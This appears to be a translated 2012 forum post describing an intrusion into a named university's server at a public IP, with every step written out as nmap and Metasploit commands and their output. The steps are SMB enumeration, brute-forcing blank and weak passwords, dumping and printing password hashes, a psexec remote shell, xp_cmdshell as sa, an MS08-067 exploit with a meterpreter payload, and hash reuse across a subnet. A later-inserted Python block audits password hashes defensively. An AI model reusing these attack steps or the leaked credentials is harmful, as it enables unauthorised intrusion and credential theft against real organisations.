nmap+msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain the user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
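The smb-pwdump lines above are in pwdump format (user:rid => LM:NT), and an administrator can read most of this machine's password problems straight off them; the Python below is an added example, not part of the original post, that parses that output and flags blank passwords, stored LM hashes and short passwords. It relies on one well-known LM property, noted in the code: any password of seven or fewer characters leaves the second 7-byte block empty, so the second half of its LM hash is always the constant AAD3B435B51404EE. The sample dump is the four result lines shown above.

```python
import re

# Well-known LM property: a password of 7 or fewer characters leaves the second
# 7-byte block empty, so its LM hash always ends in this constant ("test" above).
EMPTY_LM_HALF = "AAD3B435B51404EE"

# One smb-pwdump result line, "| user:rid => LM:NT"; the "|"/"|_" prefix is optional.
LINE_RE = re.compile(
    r"^(?:\|_?\s*)?(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+)$"
)

# Sample input: the four result lines printed by the smb-pwdump run above.
SAMPLE_DUMP = """\
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

def parse_pwdump(text):
    """Return (user, rid, lm, nt) for every line that is in pwdump format."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["lm"].strip(), m["nt"].strip()))
    return rows

def audit_account(lm, nt):
    """List the password-hygiene findings for one LM:NT hash pair."""
    findings = []
    if nt.startswith("NO PASSWORD"):
        # pwdump prints this marker instead of a hash when the password is empty.
        findings.append("blank password")
    elif not lm.startswith("NO PASSWORD"):
        # An LM hash is only present when LM hashing has not been disabled.
        findings.append("LM hash stored (LM hashing not disabled)")
        if lm.upper().endswith(EMPTY_LM_HALF):
            findings.append("password is 7 characters or shorter")
    return findings

def audit_dump(text):
    """Map each account name to its findings; accounts with none are omitted."""
    report = {}
    for user, _rid, lm, nt in parse_pwdump(text):
        findings = audit_account(lm, nt)
        if findings:
            report[user] = findings
    return report

if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print(f"{user}: {'; '.join(findings)}")
```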
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and execute a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole    // use msf to exploit the MS08-067 vulnerability against the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~